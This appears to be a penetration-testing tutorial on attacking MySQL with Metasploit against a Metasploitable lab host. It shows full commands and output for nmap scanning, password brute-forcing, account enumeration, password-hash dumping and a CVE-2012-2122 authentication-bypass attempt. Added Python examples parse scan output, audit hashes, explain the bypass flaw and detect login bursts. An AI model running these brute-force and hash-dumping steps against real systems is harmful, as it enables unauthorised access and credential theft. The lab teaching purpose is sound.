Preface
This article describes in detail how to use Metasploit to carry out a simple penetration test against MySQL.
I. db_nmap scan
Either an external nmap or the one built into Metasploit will do; to use Metasploit's built-in db_nmap, the PostgreSQL service must be started first.
1 Common nmap parameters
Target specification
-iL read the list of target IPs to scan from a file
-iR choose targets at random
No target IP needs to be given: nmap picks 100 random Internet addresses and scans them
root@kali:~# nmap -iR 100 -p100
--exclude exclude hosts from the scan
Used when you want to scan an address range but leave out specific IPs within it
root@kali:~# nmap 192.168.1.0/24 --exclude 192.168.1.1-100
--excludefile exclude the IPs listed in a file from the scan
Host discovery
-sn ping scan only, no port scan
-Pn skip host discovery and treat every host as up (gets past firewalls that drop ping probes)
-PS/PA/PU/PY[portlist] discovery probes using TCP SYN, TCP ACK, UDP or SCTP INIT to the listed ports
-PO[protocol list] IP protocol ping
-n/-R
-n: never do DNS resolution
-R: always do reverse DNS resolution
--dns-servers <serv1[,serv2],...> specify custom DNS servers
Replaces the system's default DNS servers, which may give different resolution results
root@kali:~# nmap --dns-servers 8.8.8.8 www.sina.com
--traceroute trace the path to each host, roughly equivalent to the traceroute command
root@kali:~# nmap www.baidu.com --traceroute -p80
Port scan techniques
-sS/sT/sA/sW/sM TCP-based port scans
TCP SYN Connect() ACK Window Maimon scans
i.e. TCP SYN, full connect(), ACK, Window and Maimon scans
-sU UDP scan; UDP scan results are not very accurate
-sN/sF/sX TCP Null, FIN and Xmas scans
--scanflags <flags>: every TCP scan above is just a particular combination of TCP flag bits, so a custom combination can naturally be specified
-sI <zombie host[:probeport]> idle (zombie) scan
-sY/sZ SCTP INIT/COOKIE-ECHO scans (rarely used)
-b <FTP relay host> FTP bounce scan
Port specification and scan order
-p scan specific ports or port ranges
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
--exclude-ports exclude port ranges from the scan
-F fast mode
Fast mode - Scan fewer ports than the default scan
-r scan ports consecutively
Scan ports consecutively - don't randomize
If we scan ports 1-1000, nmap by default randomises the port order on each run; -r makes nmap go through them in sequence.
--top-ports <n> scan only the n most common ports
Service/version detection
-sV probes open ports and matches the responses against nmap's large service signature database
--version-intensity <level>
Although -sV matches against nmap's large signature database, doing so inevitably adds to the scan time, so the intensity of the version-probing stage can be lowered to save as much time as possible.
--version-trace
Traces the version detection process, showing each probe as it is sent
2 Walkthrough
┌──(root💀kali)-[~]
└─# service postgresql start
┌──(root💀kali)-[~]
└─# msfconsole
.;lxO0KXXXK0Oxl:.
,o0WMMMMMMMMMMMMMMMMMMKd,
'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
:KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
.KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
lWMMMMMMMMMMMXd:.. ..;dKMMMMMMMMMMMMo
xMMMMMMMMMMWd. .oNMMMMMMMMMMk
oMMMMMMMMMMx. dMMMMMMMMMMx
.WMMMMMMMMM: :MMMMMMMMMM,
xMMMMMMMMMo lMMMMMMMMMO
NMMMMMMMMW ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW. ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd ,0MMMMMMMMMMK;
.WMMMMMMMMMc 'OMMMMMM0,
lMMMMMMMMMMk. .kMMO'
dMMMMMMMMMMWd' ..
cWMMMMMMMMMMMNxc'. ##########
.0MMMMMMMMMMMMMMMMWc #+# #+#
;0MMMMMMMMMMMMMMMo. +:+
.dNMMMMMMMMMMMMo +#++:++#+
'oOWMMMMMMMMo +:+
.,cdkO0K; :+: :+:
:::::::+:
Metasploit
=[ metasploit v6.0.46-dev ]
+ -- --=[ 2135 exploits - 1140 auxiliary - 365 post ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Open an interactive Ruby terminal with
irb
msf6 > db_nmap -sS -A 192.168.1.112
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-04 20:39 CST
[*] Nmap: Nmap scan report for 192.168.1.112
[*] Nmap: Host is up (0.00018s latency).
[*] Nmap: Not shown: 978 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
[*] Nmap: 512/tcp open exec netkit-rsh rexecd
[*] Nmap: 513/tcp open login?
[*] Nmap: 514/tcp open tcpwrapped
[*] Nmap: 1099/tcp open java-rmi GNU Classpath grmiregistry
[*] Nmap: 1524/tcp open bindshell Metasploitable root shell
[*] Nmap: 2049/tcp open nfs 2-4 (RPC #100003)
[*] Nmap: 2121/tcp open ftp ProFTPD 1.3.1
[*] Nmap: 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
[*] Nmap: | mysql-info:
[*] Nmap: | Protocol: 10
[*] Nmap: | Version: 5.0.51a-3ubuntu5
[*] Nmap: | Thread ID: 3893
[*] Nmap: | Capabilities flags: 43564
[*] Nmap: | Some Capabilities: SupportsTransactions, Support41Auth, SupportsCompression, Speaks41ProtocolNew, LongColumnFlag, SwitchToSSLAfterHandshake, ConnectWithDatabase
[*] Nmap: | Status: Autocommit
[*] Nmap: |_ Salt: )@EwKP0?+WU'_-]o8g"l
msf6 > services -u
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.1.112 3306 tcp mysql open MySQL 5.0.51a-3ubuntu5
msf6 >
Some of the output is unrelated to this article and takes up space, so it has been trimmed; adjust to the situation at hand.
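The db_nmap output above is plain console text, and the one thing worth pulling out of it for the rest of this article is which ports run MySQL and what version and protocol the handshake reports. As an added example (not part of the original post), here is a small Python parser for `[*] Nmap:` lines in exactly that format; the sample input is the session above, and the record layout (PortRecord, the mysql_summary helper) is this example's own choice.

```python
import re
from dataclasses import dataclass, field

# Sample input: the db_nmap lines from the session above, exactly as msfconsole
# prints them (every line carries the "[*] Nmap: " prefix). The 3306 entry also
# carries the mysql-info NSE script output.
DB_NMAP_OUTPUT = """\
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-04 20:39 CST
[*] Nmap: Nmap scan report for 192.168.1.112
[*] Nmap: Host is up (0.00018s latency).
[*] Nmap: Not shown: 978 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
[*] Nmap: 512/tcp open exec netkit-rsh rexecd
[*] Nmap: 513/tcp open login?
[*] Nmap: 514/tcp open tcpwrapped
[*] Nmap: 1099/tcp open java-rmi GNU Classpath grmiregistry
[*] Nmap: 1524/tcp open bindshell Metasploitable root shell
[*] Nmap: 2049/tcp open nfs 2-4 (RPC #100003)
[*] Nmap: 2121/tcp open ftp ProFTPD 1.3.1
[*] Nmap: 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
[*] Nmap: | mysql-info:
[*] Nmap: | Protocol: 10
[*] Nmap: | Version: 5.0.51a-3ubuntu5
[*] Nmap: | Thread ID: 3893
[*] Nmap: |_ Salt: )@EwKP0?+WU'_-]o8g"l
"""

PREFIX = "[*] Nmap: "
# port/proto  state  service  [version text]
PORT_RE = re.compile(r"^(\d+)/(tcp|udp|sctp)\s+(\S+)\s+(\S+)\s*(.*)$")
# NSE script output lines start with "|" (the last line of a block with "|_")
SCRIPT_RE = re.compile(r"^\|_?\s*(.*)$")


@dataclass
class PortRecord:
    port: int
    proto: str
    state: str
    service: str
    version: str
    script: dict = field(default_factory=dict)  # "Key: value" lines from NSE output


def parse_db_nmap(text: str) -> list:
    """Turn db_nmap console output into PortRecord objects.

    Script lines are attached to the most recent port record, so the
    mysql-info block ends up on the 3306/tcp entry.
    """
    records = []
    for raw in text.splitlines():
        if not raw.startswith(PREFIX):
            continue  # not an Nmap line (module chatter, prompts, ...)
        line = raw[len(PREFIX):].strip()
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            records.append(PortRecord(int(port), proto, state, service, version.strip()))
            continue
        s = SCRIPT_RE.match(line)
        if s and records:
            key, _, value = s.group(1).partition(":")
            if value.strip():  # skip the bare "mysql-info:" header line
                records[-1].script[key.strip()] = value.strip()
    return records


def find_services(records: list, name: str) -> list:
    """All open-port records whose detected service matches `name` (e.g. "mysql")."""
    return [r for r in records if r.service == name and r.state == "open"]


def mysql_summary(records: list) -> list:
    """(port, banner version, handshake protocol version) for every MySQL service."""
    return [(r.port, r.version, r.script.get("Protocol"))
            for r in find_services(records, "mysql")]


if __name__ == "__main__":
    for port, version, proto in mysql_summary(parse_db_nmap(DB_NMAP_OUTPUT)):
        print(f"MySQL on {port}/tcp: {version} (protocol {proto})")
```

The same parser works on output saved from msfconsole with `spool`, since the prefix is stripped per line; for anything larger than a lab host, nmap's `-oX` XML output is the format to parse instead.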
II. Checking the version
The module used is auxiliary/scanner/mysql/mysql_version
1 Module overview
Name: MySQL Server Version Enumeration
Module: auxiliary/scanner/mysql/mysql_version
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
kris katterjohn <katterjohn@gmail.com>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.1.112 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
THREADS 200 yes The number of concurrent threads (max one per host)
Description:
Enumerates the version of MySQL servers.
There are three options: the first is the target IP, the second the target port, and the third the number of threads; more threads is faster, but don't set it too high or it will blow up!
2 Walkthrough
msf6 > search mysql_version
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/mysql/mysql_version normal No MySQL Server Version Enumeration
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/mysql/mysql_version
msf6 > use 0
msf6 auxiliary(scanner/mysql/mysql_version) > options
Module options (auxiliary/scanner/mysql/mysql_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/mysql/mysql_version) > setg rhosts 192.168.1.112
rhosts => 192.168.1.112
msf6 auxiliary(scanner/mysql/mysql_version) > setg threads 200
threads => 200
msf6 auxiliary(scanner/mysql/mysql_version) > run
[+] 192.168.1.112:3306 - 192.168.1.112:3306 is running MySQL 5.0.51a-3ubuntu5 (protocol 10)
[*] 192.168.1.112:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
III. Brute-forcing the password
1 Module overview
Name: MySQL Login Utility
Module: auxiliary/scanner/mysql/mysql_login
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Bernardo Damele A. G. <bernardo.damele@gmail.com>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE passwords.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.112 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 200 yes The number of concurrent threads (max one per host)
USERNAME root no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
Description:
This module simply queries the MySQL instance for a specific
user/pass (default is root with blank).
References:
https://nvd.nist.gov/vuln/detail/CVE-1999-0502
A few options matter here; those already covered above are not repeated.
First, PASSWORD, the database password; normally we are trying to crack it, and if we already knew it we wouldn't need this module.
Second, PASS_FILE, the password dictionary, a plain text file with one password per line.
USERNAME and USER_FILE work the same way.
2 Walkthrough
msf6 auxiliary(scanner/mysql/mysql_version) > search mysql_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/mysql/mysql_login normal No MySQL Login Utility
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_version) > use 0
msf6 auxiliary(scanner/mysql/mysql_login) > options
Module options (auxiliary/scanner/mysql/mysql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.112 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 200 yes The number of concurrent threads (max one per host)
USERNAME root no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf6 auxiliary(scanner/mysql/mysql_login) > setg pass_file passwords.txt
pass_file => passwords.txt
msf6 auxiliary(scanner/mysql/mysql_login) > exploit
I won't reproduce the brute-force output here; there is too much of it.
IV. Information gathering
1 Enumerating database information
① Module overview
Name: MySQL Enumeration Module
Module: auxiliary/admin/mysql/mysql_enum
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Carlos Perez <carlos_perez@darkoperator.com>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD qwer no The password for the specified username
RHOSTS 192.168.1.112 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
USERNAME root no The username to authenticate as
Description:
This module allows for simple enumeration of MySQL Database Server
provided proper credentials to connect remotely.
References:
https://cisecurity.org/benchmarks.html
This module performs simple enumeration of a MySQL database server, given valid credentials to connect remotely.
② Walkthrough
Use auxiliary/admin/mysql/mysql_enum
msf6 auxiliary(scanner/mysql/mysql_login) > search mysql_enum
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/mysql/mysql_enum normal No MySQL Enumeration Module
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/mysql/mysql_enum
msf6 auxiliary(scanner/mysql/mysql_login) > use 0
msf6 auxiliary(admin/mysql/mysql_enum) > options
Module options (auxiliary/admin/mysql/mysql_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS 192.168.1.112 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
USERNAME no The username to authenticate as
msf6 auxiliary(admin/mysql/mysql_enum) > setg username root
username => root
msf6 auxiliary(admin/mysql/mysql_enum) > setg password qwer
password => qwer
msf6 auxiliary(admin/mysql/mysql_enum) > run
[*] Running module against 192.168.1.112
[*] 192.168.1.112:3306 - Running MySQL Enumerator...
[*] 192.168.1.112:3306 - Enumerating Parameters
[*] 192.168.1.112:3306 - MySQL Version: 5.0.51a-3ubuntu5
[*] 192.168.1.112:3306 - Compiled for the following OS: debian-linux-gnu
[*] 192.168.1.112:3306 - Architecture: i486
[*] 192.168.1.112:3306 - Server Hostname: metasploitable
[*] 192.168.1.112:3306 - Data Directory: /var/lib/mysql/
[*] 192.168.1.112:3306 - Logging of queries and logins: OFF
[*] 192.168.1.112:3306 - Old Password Hashing Algorithm OFF
[*] 192.168.1.112:3306 - Loading of local files: ON
[*] 192.168.1.112:3306 - Deny logins with old Pre-4.1 Passwords: OFF
[*] 192.168.1.112:3306 - Allow Use of symlinks for Database Files: YES
[*] 192.168.1.112:3306 - Allow Table Merge: YES
[*] 192.168.1.112:3306 - SSL Connections: Enabled
[*] 192.168.1.112:3306 - SSL CA Certificate: /etc/mysql/cacert.pem
[*] 192.168.1.112:3306 - SSL Key: /etc/mysql/server-key.pem
[*] 192.168.1.112:3306 - SSL Certificate: /etc/mysql/server-cert.pem
[*] 192.168.1.112:3306 - Enumerating Accounts:
[*] 192.168.1.112:3306 - List of Accounts with Password Hashes:
[+] 192.168.1.112:3306 - User: debian-sys-maint Host: Password Hash:
[+] 192.168.1.112:3306 - User: root Host: % Password Hash: *2491CA5000A9614AA28C39036702D965584486EC
[+] 192.168.1.112:3306 - User: guest Host: % Password Hash:
[*] 192.168.1.112:3306 - The following users have GRANT Privilege:
[*] 192.168.1.112:3306 - User: debian-sys-maint Host:
[*] Auxiliary module execution completed
msf6 auxiliary(admin/mysql/mysql_enum) >
2 Dumping password hashes
① Module overview
Name: MYSQL Password Hashdump
Module: auxiliary/scanner/mysql/mysql_hashdump
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
theLightCosine <theLightCosine@metasploit.com>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD qwer no The password for the specified username
RHOSTS 192.168.1.112 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
THREADS 200 yes The number of concurrent threads (max one per host)
USERNAME root no The username to authenticate as
Description:
This module extracts the usernames and encrypted password hashes
from a MySQL server and stores them for later cracking.
This module dumps the password hashes of every account that is visible with the privileges of the logged-in user.
② Walkthrough
msf6 auxiliary(admin/mysql/mysql_enum) > search mysql_hashdump
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/mysql/mysql_hashdump normal No MYSQL Password Hashdump
1 auxiliary/analyze/crack_databases normal No Password Cracker: Databases
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/analyze/crack_databases
msf6 auxiliary(admin/mysql/mysql_enum) > sue 0
[-] Unknown command: sue.
msf6 auxiliary(admin/mysql/mysql_enum) > use 0
msf6 auxiliary(scanner/mysql/mysql_hashdump) > options
Module options (auxiliary/scanner/mysql/mysql_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD qwer no The password for the specified username
RHOSTS 192.168.1.112 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
THREADS 200 yes The number of concurrent threads (max one per host)
USERNAME root no The username to authenticate as
msf6 auxiliary(scanner/mysql/mysql_hashdump) > run
[+] 192.168.1.112:3306 - Saving HashString as Loot: debian-sys-maint:
[+] 192.168.1.112:3306 - Saving HashString as Loot: root:*2491CA5000A9614AA28C39036702D965584486EC
[+] 192.168.1.112:3306 - Saving HashString as Loot: guest:
[*] 192.168.1.112:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/mysql/mysql_hashdump) >
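The hashdump loot above already shows what a defender should look for: two accounts (debian-sys-maint and guest) with an empty hash, meaning no password is set at all, and a root hash in the mysql_native_password format, which is "*" followed by the uppercase hex of SHA1(SHA1(password)). As an added example (not the module's code), the following Python reproduces that hash format and audits user:hash lines for blank passwords, pre-4.1 hashes and matches against a tiny constructed weak-password list. The sample loot lines and the weak list are constructed here; the real root hash from the session is deliberately not reproduced.

```python
import hashlib


def mysql_native_hash(password: str) -> str:
    """PASSWORD() as used by mysql_native_password (MySQL 4.1+):
    '*' followed by the uppercase hex of SHA1(SHA1(password))."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def verify_native(password: str, stored_hash: str) -> bool:
    """True when `password` reproduces a stored mysql_native_password hash."""
    return mysql_native_hash(password) == stored_hash.strip().upper()


# Constructed sample loot in the "user:hash" form mysql_hashdump prints.
# The hashes are computed here from made-up passwords.
SAMPLE_LOOT = [
    "debian-sys-maint:",
    "root:" + mysql_native_hash("qwer"),
    "guest:",
    "app:" + mysql_native_hash("S7rong!Passphrase-2021"),
    "legacy:5d2e19393cc5ef67",  # 16 hex digits: pre-4.1 OLD_PASSWORD() format (constructed)
]

# A tiny constructed weak-password list; a real audit would use a proper wordlist.
WEAK_PASSWORDS = ["root", "qwer", "123456", "password"]


def audit_hash_lines(lines, weak_passwords):
    """Flag accounts with no password, pre-4.1 hashes, unknown hash formats,
    or a mysql_native_password hash matching one of `weak_passwords`."""
    findings = []
    for line in lines:
        user, _, h = line.partition(":")
        h = h.strip()
        if h == "":
            # empty Password/authentication_string: the account needs no password
            findings.append((user, "no password set"))
        elif len(h) == 16:
            findings.append((user, "pre-4.1 password hash"))
        elif not (h.startswith("*") and len(h) == 41):
            # e.g. caching_sha2_password ($A$...) or sha256_password: not checked here
            findings.append((user, "non-native hash format, not checked"))
        else:
            for pw in weak_passwords:
                if verify_native(pw, h):
                    findings.append((user, f"weak password {pw!r}"))
                    break
    return findings


if __name__ == "__main__":
    for user, issue in audit_hash_lines(SAMPLE_LOOT, WEAK_PASSWORDS):
        print(f"{user}: {issue}")
```

The check is cheap because mysql_native_password is an unsalted double SHA1, which is also why a dumped hash of a short password falls to a wordlist in seconds; the enum output earlier ("Old Password Hashing Algorithm OFF", "Deny logins with old Pre-4.1 Passwords: OFF") is where the pre-4.1 case comes from.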
V. Exploiting the MySQL authentication vulnerability
1 Module overview
Name: MySQL Authentication Bypass Password Dump
Module: auxiliary/scanner/mysql/mysql_authbypass_hashdump
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2012-06-09
Provided by:
theLightCosine <theLightCosine@metasploit.com>
jcran <jcran@metasploit.com>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.1.112 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
THREADS 200 yes The number of concurrent threads (max one per host)
USERNAME root yes The username to authenticate as
Description:
This module exploits a password bypass vulnerability in MySQL in
order to extract the usernames and encrypted password hashes from a
MySQL server. These hashes are stored as loot for later cracking.
References:
https://nvd.nist.gov/vuln/detail/CVE-2012-2122
OSVDB (82804)
https://blog.rapid7.com/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
This module exploits CVE-2012-2122. I once found an instance of it while testing NetEase and reported it to NSRC.
It is a probabilistic password-login flaw for any MySQL user: according to the advisory, roughly one attempt in 256 succeeds. All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.
CVE ID: CVE-2012-2122
MariaDB is a database server that acts as a drop-in replacement for MySQL; MySQL is an open-source database.
MariaDB before 5.1.62, 5.2.12, 5.3.6 and 5.5.23, and MySQL before 5.1.63, 5.5.24 and 5.6.6, have a flaw in the handling of user authentication that can let an attacker log in to the MySQL server without knowing the correct password. After a user connects to MariaDB/MySQL, the server computes and compares the authentication token; because of an incorrect type conversion, the comparison can be judged a match even when memcmp() returns a non-zero value, so MySQL/MariaDB wrongly concludes the password is correct. Since the protocol uses a random challenge string, the bug triggers with probability 1/256. Whether a given MySQL build is affected depends on how it was compiled; many builds (including the official binaries) are not affected by this vulnerability.
In other words, as long as the username is known, repeated attempts will eventually log straight into the database; according to the advisory, about one attempt in 256 succeeds.
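The root cause described above, the memcmp() return value being narrowed into my_bool (a char), is easy to show in isolation. As an added example, not code from the post or from MySQL itself, this Python snippet emulates that narrowing and sets the pre-fix check beside the corrected one (normalise to equal/not-equal before the value is narrowed). The memcmp() result ranges are constructed; the SIGN_ONLY case illustrates the last sentence above: a build whose memcmp() only ever returns -1/0/1 never triggers the bug, which is why exposure depends on how the binary was compiled.

```python
def to_my_bool(value: int) -> int:
    """Emulate C's implicit conversion of an int to my_bool (typedef char):
    only the low 8 bits survive, read back as a signed byte."""
    return ((value + 128) % 256) - 128


def vulnerable_scramble_matches(memcmp_result: int) -> bool:
    """Pre-fix behaviour: check_scramble() returned the raw memcmp() result through
    a my_bool, and the caller treated a zero return as 'token matches'."""
    return to_my_bool(memcmp_result) == 0


def fixed_scramble_matches(memcmp_result: int) -> bool:
    """Post-fix behaviour: the result is reduced to equal / not-equal before it is
    narrowed, so only a real memcmp() == 0 counts as a match."""
    return memcmp_result == 0


def false_accept_rate(memcmp_results, matches=vulnerable_scramble_matches) -> float:
    """Fraction of *non-matching* comparisons that `matches` still accepts."""
    nonzero = [r for r in memcmp_results if r != 0]
    accepted = sum(1 for r in nonzero if matches(r))
    return accepted / len(nonzero)


# Constructed inputs. An optimised memcmp() (for example the SSE variant in glibc)
# may return the full difference between the first mismatching bytes or words
# rather than just -1/0/1, so we sample a whole range of possible results.
FULL_RANGE = range(-1024, 1024)
# A memcmp() that only ever returns -1/0/1: the "this build is not affected" case.
SIGN_ONLY = [-1, 0, 1]


if __name__ == "__main__":
    print("truncating check, wide memcmp:", false_accept_rate(FULL_RANGE))
    print("fixed check, wide memcmp:     ", false_accept_rate(FULL_RANGE, fixed_scramble_matches))
    print("truncating check, -1/0/1 only:", false_accept_rate(SIGN_ONLY))
```

Every non-zero memcmp() result that is a multiple of 256 is narrowed to 0 and accepted, which is where the roughly 1-in-256 figure comes from when the compared bytes are effectively random; the fixed variant never accepts a non-zero result regardless of what memcmp() returns.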
2 Walkthrough
msf6 auxiliary(scanner/mysql/mysql_hashdump) > search mysql_auth
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/mysql/mysql_authbypass_hashdump 2012-06-09 normal No MySQL Authentication Bypass Password Dump
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf6 auxiliary(scanner/mysql/mysql_hashdump) > use 0
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > options
Module options (auxiliary/scanner/mysql/mysql_authbypass_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.1.112 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
THREADS 200 yes The number of concurrent threads (max one per host)
USERNAME root yes The username to authenticate as
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > run
[+] 192.168.1.112:3306 - 192.168.1.112:3306 The server allows logins, proceeding with bypass test
[*] 192.168.1.112:3306 - 192.168.1.112:3306 Authentication bypass is 10% complete
[*] 192.168.1.112:3306 - 192.168.1.112:3306 Authentication bypass is 20% complete
[*] 192.168.1.112:3306 - 192.168.1.112:3306 Authentication bypass is 30% complete
[*] 192.168.1.112:3306 - 192.168.1.112:3306 Authentication bypass is 40% complete
[*] 192.168.1.112:3306 - 192.168.1.112:3306 Authentication bypass is 50% complete
[*] 192.168.1.112:3306 - 192.168.1.112:3306 Authentication bypass is 60% complete
[*] 192.168.1.112:3306 - 192.168.1.112:3306 Authentication bypass is 70% complete
[*] 192.168.1.112:3306 - 192.168.1.112:3306 Authentication bypass is 80% complete
[*] 192.168.1.112:3306 - 192.168.1.112:3306 Authentication bypass is 90% complete
[*] 192.168.1.112:3306 - 192.168.1.112:3306 Authentication bypass is 100% complete
[-] 192.168.1.112:3306 - 192.168.1.112:3306 Unable to bypass authentication, this target may not be vulnerable
[*] 192.168.1.112:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
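Both the wordlist run in section III and the bypass module in this section leave the same server-side trace: a burst of rejected logins for one user from one client host within a short time. As an added defender-side example, not from the post, the Python below runs that check over constructed MySQL error-log lines in the 5.7 "Access denied for user" format (these lines exist only when log_error_verbosity=3; 5.6 logs them as [Warning] with log_warnings=2, so the logging setting has to be enabled first). The sample lines, the threshold and the window are this example's own assumptions; the source address reuses the Kali box's LHOST from the session for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# MySQL 5.7-style error-log line for a rejected login. The timestamp group stops
# before the trailing "Z"; the tag is [Note] on 5.7 and [Warning] on 5.6.
DENIED_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d\.\d+)Z\s+\d+\s+\[(?:Note|Warning)\]\s+"
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)'"
)


def parse_ts(ts: str) -> datetime:
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f")


def detect_login_bursts(lines, threshold=20, window_seconds=60):
    """Alert when one client host produces `threshold` rejected logins for the same
    user within `window_seconds`. One alert per (host, user) burst."""
    recent = defaultdict(deque)  # (host, user) -> timestamps still inside the window
    alerted = set()
    alerts = []
    for line in lines:
        m = DENIED_RE.match(line)
        if not m:
            continue
        ts = parse_ts(m["ts"])
        key = (m["host"], m["user"])
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > timedelta(seconds=window_seconds):
            q.popleft()  # drop events that fell out of the sliding window
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"host": key[0], "user": key[1], "count": len(q),
                           "first": q[0], "last": ts})
    return alerts


def denied_line(ts: datetime, seq: int, user: str, host: str) -> str:
    """Build one constructed error-log line in the format DENIED_RE expects."""
    return (f"{ts.strftime('%Y-%m-%dT%H:%M:%S.%f')}Z {seq} [Note] "
            f"Access denied for user '{user}'@'{host}' (using password: YES)")


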